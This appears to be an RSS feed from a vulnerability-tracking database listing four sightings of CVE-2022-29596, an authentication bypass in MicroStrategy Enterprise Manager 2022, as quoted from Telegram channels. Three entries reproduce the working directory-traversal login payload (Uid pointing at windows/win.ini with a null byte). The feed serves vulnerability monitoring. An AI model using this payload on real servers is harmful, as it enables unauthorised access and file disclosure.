<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://db.gcve.eu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 14 May 2026 19:36:20 +0000</lastBuildDate>
    <item>
      <title>95bfc649-8489-4aff-bb91-fcd436a1a9a8</title>
      <link>https://db.gcve.eu/sighting/95bfc649-8489-4aff-bb91-fcd436a1a9a8/export</link>
      <description>{"uuid": "95bfc649-8489-4aff-bb91-fcd436a1a9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29596", "type": "seen", "source": "https://t.me/cibsecurity/42452", "content": "\u203c CVE-2022-29596 \u203c\n\nMicroStrategy Enterprise Manager 2022 allows authentication bypass by triggering a login failure and then entering the Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;amp;Pwd=_any_password_&amp;amp;ConnMode=1&amp;amp;3054=Login substring for directory traversal.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-12T00:34:35.000000Z"}</description>
      <content:encoded>{"uuid": "95bfc649-8489-4aff-bb91-fcd436a1a9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29596", "type": "seen", "source": "https://t.me/cibsecurity/42452", "content": "\u203c CVE-2022-29596 \u203c\n\nMicroStrategy Enterprise Manager 2022 allows authentication bypass by triggering a login failure and then entering the Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;amp;Pwd=_any_password_&amp;amp;ConnMode=1&amp;amp;3054=Login substring for directory traversal.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-12T00:34:35.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/95bfc649-8489-4aff-bb91-fcd436a1a9a8/export</guid>
      <pubDate>Thu, 12 May 2022 00:34:35 +0000</pubDate>
    </item>
    <item>
      <title>6e91933f-bc2c-4057-86db-dee5a75460dc</title>
      <link>https://db.gcve.eu/sighting/6e91933f-bc2c-4057-86db-dee5a75460dc/export</link>
      <description>{"uuid": "6e91933f-bc2c-4057-86db-dee5a75460dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29596", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1211", "content": "CVE-2022-29596\nMicroStrategy Enterprise Manager 2022\n\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e, \u0432\u044b\u0437\u044b\u0432\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0443 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0430 \u0437\u0430\u0442\u0435\u043c \u0432\u0432\u043e\u0434\u044f:\n\nUid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;amp;Pwd=_any_password_&amp;amp;ConnMode=1&amp;amp;3054=Login\n\n#microsoft #bypass", "creation_timestamp": "2022-12-08T09:14:46.000000Z"}</description>
      <content:encoded>{"uuid": "6e91933f-bc2c-4057-86db-dee5a75460dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29596", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1211", "content": "CVE-2022-29596\nMicroStrategy Enterprise Manager 2022\n\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e, \u0432\u044b\u0437\u044b\u0432\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0443 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0430 \u0437\u0430\u0442\u0435\u043c \u0432\u0432\u043e\u0434\u044f:\n\nUid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;amp;Pwd=_any_password_&amp;amp;ConnMode=1&amp;amp;3054=Login\n\n#microsoft #bypass", "creation_timestamp": "2022-12-08T09:14:46.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/6e91933f-bc2c-4057-86db-dee5a75460dc/export</guid>
      <pubDate>Thu, 08 Dec 2022 09:14:46 +0000</pubDate>
    </item>
    <item>
      <title>4994dfc3-1077-45fe-9106-1f4275d0c656</title>
      <link>https://db.gcve.eu/sighting/4994dfc3-1077-45fe-9106-1f4275d0c656/export</link>
      <description>{"uuid": "4994dfc3-1077-45fe-9106-1f4275d0c656", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29596", "type": "published-proof-of-concept", "source": "Telegram/9o0ymoPbqxJogDBdOsK7IpGE8avxrE6uGvpNwdwk5ffIOlw", "content": "", "creation_timestamp": "2022-12-13T07:08:05.000000Z"}</description>
      <content:encoded>{"uuid": "4994dfc3-1077-45fe-9106-1f4275d0c656", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29596", "type": "published-proof-of-concept", "source": "Telegram/9o0ymoPbqxJogDBdOsK7IpGE8avxrE6uGvpNwdwk5ffIOlw", "content": "", "creation_timestamp": "2022-12-13T07:08:05.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/4994dfc3-1077-45fe-9106-1f4275d0c656/export</guid>
      <pubDate>Tue, 13 Dec 2022 07:08:05 +0000</pubDate>
    </item>
    <item>
      <title>ae07acf5-0e15-4f3c-b4fe-8958861ed119</title>
      <link>https://db.gcve.eu/sighting/ae07acf5-0e15-4f3c-b4fe-8958861ed119/export</link>
      <description>{"uuid": "ae07acf5-0e15-4f3c-b4fe-8958861ed119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29596", "type": "seen", "source": "https://t.me/LearnExploit/4380", "content": "CVE-2022-29596 ( MicroStrategy Enterprise Manager 2022 )\n\nUid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;amp;Pwd=_any_password_&amp;amp;ConnMode=1&amp;amp;3054= Login\n\n#microsoft #bypass\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:38.000000Z"}</description>
      <content:encoded>{"uuid": "ae07acf5-0e15-4f3c-b4fe-8958861ed119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29596", "type": "seen", "source": "https://t.me/LearnExploit/4380", "content": "CVE-2022-29596 ( MicroStrategy Enterprise Manager 2022 )\n\nUid=/../../../../../../../../../../../windows/win.ini%00.jpg&amp;amp;Pwd=_any_password_&amp;amp;ConnMode=1&amp;amp;3054= Login\n\n#microsoft #bypass\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:38.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/ae07acf5-0e15-4f3c-b4fe-8958861ed119/export</guid>
      <pubDate>Wed, 04 Jan 2023 10:02:38 +0000</pubDate>
    </item>
  </channel>
</rss>
